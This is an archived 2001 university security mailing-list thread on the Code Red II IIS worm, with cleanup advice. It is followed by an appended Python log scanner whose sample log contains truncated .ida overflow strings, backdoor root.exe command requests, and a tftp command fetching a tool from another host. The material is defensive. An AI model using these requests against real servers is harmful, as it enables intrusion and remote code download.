Re: [Security]: Code Red II Alert - Follow-up and Clarification


From: Mike Friedman (mikef@ack.berkeley.edu)
Date: Mon Aug 06 2001 - 17:05:22 PDT


On Mon Aug 6 16:42:30 2001, Sherry M. Rogers said:

> I'm sending a clarification to the first note about Code Red II since
> apparently I was not clear about how to protect your systems from this
> second worm.
>
> Code Red II takes advantage of the same IIS vulnerability as that
> of the original Code Red worm, therefore the same patches will protect
> your system.
>
> The best source of information about checking and protecting your
> system from both Code Red worms is to go to the Digital Island site
> below and follow the step-by-step instructions.
>
> http://www.digitalisland.net/codered

I don't want to risk muddying the waters by posting a 'clarification to the
clarification'. But I just want to remind folks who are seeing all these
notes that there are two issues here:

o As Sherry says, the instructions for protecting yourself from an
   initial attack by Code Red II are the same as for Code Red I.

o BUT... if you've already been 'infected' by Code Red II, the
   procedures for cleaning your machine are much more involved for
   CR II than for CR I. In case you didn't save it, I'm including
   below Sherry's earlier note which talks about what to do if your
   machine actually has been compromised by CR II.

Mike

============
A new worm is infecting vulnerable machines running IIS servers on
the internet and has already infected many hosts on the campus.

It is called the Code Red II worm, though it has little in common with the
original Code Red worm other than using the buffer overflow vulnerability
in Microsoft's IIS Indexing Service DLL (ida.dll) to infect the victim.

Code Red II can infect unpatched Windows 2000 servers running IIS 4.0 or
5.0 with Indexing Service installed. It can cause unpatched Windows NT
servers to crash.

The Code Red II worm is far more malicious than its predecessor:

1) It spreads more quickly by targeting hosts on the local network, making
   it difficult to catch by monitoring network traffic at the border of
   campus.

2) It makes the system it infects vulnerable to *any* kind of attack by
   copying the CMD.EXE to root.exe in a publicly accessible directory.
   This allows any intruder to execute arbitrary commands on the
   compromised machine.

3) It creates a Trojan horse copy of explorer.exe which makes
   registry changes allowing for the placement of "backdoors" for future
   access to the system. These changes create a virtual web path with
   read and write access to all files on the c: and d: drives.

Note: deleting the registry settings, removing the copies of root.exe, and
removing the trojan explorer.exe is NOT sufficient to clean the system.
During the time the system was backdoored any attacker could have
installed code not associated with this worm.

Any system infected with Code Red II will need to be rebuilt from secure
media, such as CD, to ensure that it is clean and that no backdoors have been
left on the system. Applying all maintenance, in particular all IIS
maintenance, will also be essential.

This worm spreads so fast that it is also essential to not connect any new
system to the network unless you are sure IIS is disabled. Immediately
apply the IIS patches once the system is on the network, whether or not
you plan to run the service. Often IIS can be turned on by software
packages at a later time.

References:

http://www.cert.org/incident_notes/IN-2001-09.html

http://www.incidents.org/react/code_redII.php

Resources:

Securing IIS:
http://securityfocus.com/focus/microsoft/iis/iissecure.html

Free Code Red scanner from eEye:
http://www.eeye.com/html/Research/Tools/

----------------------------------------------------------------------------
Mike Friedman mikef@ack.Berkeley.EDU
System & Network Security +1-510-642-1410
University of California at Berkeley http://ack.Berkeley.EDU/~mikef
----------------------------------------------------------------------------
-----------------------------------------------------------------------
The following was automatically added to this message by the list server:

Webnet information is available at <URL:http://wss.berkeley.edu/webnet/>.
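Because Code Red II spreads preferentially to nearby addresses (point 1 in the note above), border monitoring may miss it, so the host's own IIS logs are the place to look. The script below is an added example, not part of either message on this page: it parses IIS W3C extended log lines (the sample log is constructed here, not taken from any real host) and flags the two things the note describes, the .ida overflow request that infects the server and later use of the backdoors the worm leaves behind. Two details are assumptions drawn from the public analyses the note references rather than from the note itself: the original Code Red padded its request with a run of "N" characters while Code Red II used "X", and the backdoors appear as root.exe under the scripts and MSADC directories and as the /c and /d virtual roots that map to the C: and D: drives.

```python
import re
from collections import Counter

# Constructed sample IIS 5.0 W3C extended log (not from the original note).
# The .ida requests are shortened; real ones carry ~224 filler characters.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-08-06 16:02:11 169.229.1.10 GET /default.htm - 200
2001-08-06 16:03:44 169.229.5.77 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200
2001-08-06 16:05:02 169.229.6.12 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200
2001-08-06 16:09:30 10.1.2.3 GET /scripts/root.exe /c+dir 200
2001-08-06 16:10:15 10.1.2.3 GET /c/winnt/system32/cmd.exe /c+dir+c:\\ 200
2001-08-06 16:11:01 10.1.2.3 GET /MSADC/root.exe /c+tftp+-i+10.1.2.3+GET+tool.exe 200
2001-08-06 16:12:40 169.229.1.10 GET /images/logo.gif - 304
"""

# Assumption (public analyses, not this note): Code Red I pads with "N", Code Red II with "X".
IDA_FILLER = re.compile(r"^(N{10,}|X{10,})")
UNICODE_SHELLCODE = re.compile(r"%u[0-9a-f]{4}", re.I)
# Assumption (CERT/eEye write-ups): cmd.exe copied to root.exe in the scripts and MSADC dirs.
ROOT_EXE = re.compile(r"^/(scripts|msadc)/root\.exe$", re.I)
# Assumption: the trojaned explorer.exe adds /c and /d virtual roots mapping to C:\ and D:\.
VIRTUAL_ROOT_CMD = re.compile(r"^/[cd]/.*\bcmd\.exe$", re.I)


def parse_w3c(log_text):
    """Yield one dict per data line, using the #Fields header for column names."""
    fields = None
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        if fields is None:
            raise ValueError("log data appears before a #Fields header")
        parts = line.split()
        if len(parts) != len(fields):
            continue  # truncated or malformed line; skip rather than misattribute columns
        yield dict(zip(fields, parts))


def classify(row):
    """Return an event label for a log row, or None if it looks benign."""
    stem = row.get("cs-uri-stem", "")
    query = row.get("cs-uri-query", "-")
    if stem.lower() == "/default.ida" and UNICODE_SHELLCODE.search(query):
        m = IDA_FILLER.match(query)
        if m:
            return "codered2-infection" if m.group(1)[0] == "X" else "codered1-infection"
        return "ida-overflow-unknown"
    if ROOT_EXE.match(stem):
        return "backdoor-root.exe"
    if VIRTUAL_ROOT_CMD.match(stem):
        return "backdoor-virtual-root"
    return None


def scan(log_text):
    """Return the suspicious rows with time, client, label, status and request."""
    hits = []
    for row in parse_w3c(log_text):
        kind = classify(row)
        if kind is None:
            continue
        query = row.get("cs-uri-query", "-")
        request = row["cs-uri-stem"] + ("?" + query if query != "-" else "")
        hits.append({
            "time": f"{row['date']} {row['time']}",
            "client": row["c-ip"],
            "kind": kind,
            "status": row.get("sc-status", "-"),
            "request": request,
        })
    return hits


def summarize(hits):
    """Count events per label and report whether any backdoor request succeeded (2xx)."""
    counts = Counter(h["kind"] for h in hits)
    backdoor_used = any(h["kind"].startswith("backdoor") and h["status"].startswith("2")
                        for h in hits)
    return counts, backdoor_used


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(f"{h['time']} {h['client']:<14} {h['status']} {h['kind']:<22} {h['request'][:60]}")
    counts, backdoor_used = summarize(found)
    print(dict(counts))
    if backdoor_used:
        print("Backdoor requests returned 2xx: the host is compromised; rebuild from secure media.")
```

A 2xx on a root.exe or /c/.../cmd.exe request is the important signal: it means the backdoor was present and answered, so the machine falls under the rebuild-from-media advice above rather than a clean-up of the worm's own files. An .ida hit on a patched server, by contrast, shows only that the host was probed.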



This archive was generated by hypermail 2b29 : Mon Aug 06 2001 - 17:10:02 PDT